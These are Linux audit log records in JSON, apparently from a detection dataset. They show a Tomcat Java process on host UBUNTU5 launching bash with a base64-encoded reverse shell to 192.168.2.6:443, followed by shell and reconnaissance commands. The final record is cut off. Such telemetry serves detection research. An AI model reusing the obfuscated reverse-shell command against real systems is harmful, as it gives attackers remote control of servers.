{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84142): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84141): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:21Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.986:84140): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=no exit=-2 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"http-nio-8080-e\" exe=\"/usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/sbin/bash\" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/sbin/bash\"] path_nametype=[\"UNKNOWN\"] path_mode=[\"\"] path_ouid=[\"\"] path_ogid=[\"\"] proctitle=/usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.l redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.007Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292621.990:84143): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=3 cmdline=\"bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuNi80NDMgMD4mMQo=}|{base64,-d}|{bash,-i}\"\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=7fcd3bdfb8e0 a1=7fcd3027b7b0 a2=7ffccab2a7d8 a3=b ppid=1340 pid=17790 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=3 cmdline=\"bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuNi80NDMgMD4mMQo=}|{base64,-d}|{bash,-i}\"\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.017Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84144): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2510 a1=5601f9bb27c0 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17794 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"bash -i\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2510 a1=5601f9bb27c0 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17794 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"bash\" exe=\"/bin/bash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/bin/bash\" inode=31 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/bin/bash\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"bash -i\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.023Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.006:84145): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2540 a1=5601f9bb2820 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17793 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"base64\" exe=\"/usr/bin/base64\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/base64\" inode=4094 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/base64\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"base64 -d\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=5601f9bb2540 a1=5601f9bb2820 a2=5601f9bb00a0 a3=5601f9ba4010 ppid=17790 pid=17793 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"base64\" exe=\"/usr/bin/base64\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/base64\" inode=4094 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/base64\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"base64 -d\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.063Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.042:84148): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d922d0 a1=556da3d923b0 a2=556da3d92b70 a3=8 ppid=17797 pid=17798 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"groups\" exe=\"/usr/bin/groups\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/groups\" inode=4166 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/groups\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=1 cmdline=\"groups\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d922d0 a1=556da3d923b0 a2=556da3d92b70 a3=8 ppid=17797 pid=17798 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"groups\" exe=\"/usr/bin/groups\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/groups\" inode=4166 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/groups\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=1 cmdline=\"groups\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.077Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.066:84150): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d90ed0 a1=556da3d90430 a2=556da3d901c0 a3=556da3d7f010 ppid=17799 pid=17800 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"lesspipe\" exe=\"/bin/dash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/lesspipe\" inode=127 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/lesspipe\",\"/bin/sh\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\",\"0\"] path_ogid=[\"0\",\"0\",\"0\"] argc=2 cmdline=\"/bin/sh /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556da3d90ed0 a1=556da3d90430 a2=556da3d901c0 a3=556da3d7f010 ppid=17799 pid=17800 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"lesspipe\" exe=\"/bin/dash\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/lesspipe\" inode=127 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/lesspipe\",\"/bin/sh\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\",\"0\"] path_ogid=[\"0\",\"0\",\"0\"] argc=2 cmdline=\"/bin/sh /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.09Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.082:84151): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f04197858 a1=556f03217c00 a2=556f041977c8 a3=556f04197010 ppid=17800 pid=17801 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"basename\" exe=\"/usr/bin/basename\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/basename\" inode=4095 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/basename\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"basename /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f04197858 a1=556f03217c00 a2=556f041977c8 a3=556f04197010 ppid=17800 pid=17801 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"basename\" exe=\"/usr/bin/basename\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/basename\" inode=4095 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/basename\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"basename /usr/bin/lesspipe\" redactors= containerid="}
{"TenantId":"redacted","SourceSystem":"Linux","TimeGenerated":"2022-05-11T18:10:22.103Z","Computer":"UBUNTU5","EventTime":"2022-05-11T18:10:22Z","Facility":"user","HostName":"UBUNTU5","SeverityLevel":"info","SyslogMessage":"type=AUOMS_EXECVE audit(1652292622.094:84153): SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f041a2aa8 a1=556f041a29e0 a2=556f041a2a18 a3=556f04197010 ppid=17802 pid=17803 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dirname\" exe=\"/usr/bin/dirname\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dirname\" inode=4158 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dirname\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] path_mode=[\"0100755\",\"0100755\"] path_ouid=[\"0\",\"0\"] path_ogid=[\"0\",\"0\"] argc=2 cmdline=\"dirname /usr/bin/lesspipe\" redactors= containerid=","HostIP":"192.168.2.5","ProcessName":"auoms","MG":"00000000-0000-0000-0000-000000000002","Type":"Syslog","_ResourceId":"/subscriptions/redacted/resourcegroups/redacted/providers/microsoft.compute/virtualmachines/ubuntu5","EventType":"AUOMS_EXECVE","EventData":"SchemaVersion=\"1\" auoms_version=2.5.2.0 node=UBUNTU5 arch=x86_64 syscall=execve syscall_r=59 success=yes exit=0 a0=556f041a2aa8 a1=556f041a29e0 a2=556f041a2a18 a3=556f04197010 ppid=17802 pid=17803 audit_user=unset auid=4294967295 user=tomcat uid=1001 group=tomcat gid=1001 effective_user=tomcat euid=1001 set_user=tomcat suid=1001 filesystem_user=tomcat fsuid=1001 effective_group=tomcat egid=1001 set_group=tomcat sgid=1001 filesystem_group=tomcat fsgid=1001 tty=(none) ses=\"-1\" comm=\"dirname\" exe=\"/usr/bin/dirname\" key=auoms,delete key_r=61756F6D730164656C657465 cwd=\"/\" name=\"/usr/bin/dirname\" inode=4158 dev=08:01 mode=file,755 o_user=root ouid=0 owner_group=root ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 path_name=[\"/usr/bin/dirname\",\"/lib64/ld-linux-x86-64.so.2\"] path_nametype=[\"NORMAL\",\"NORMAL\"] 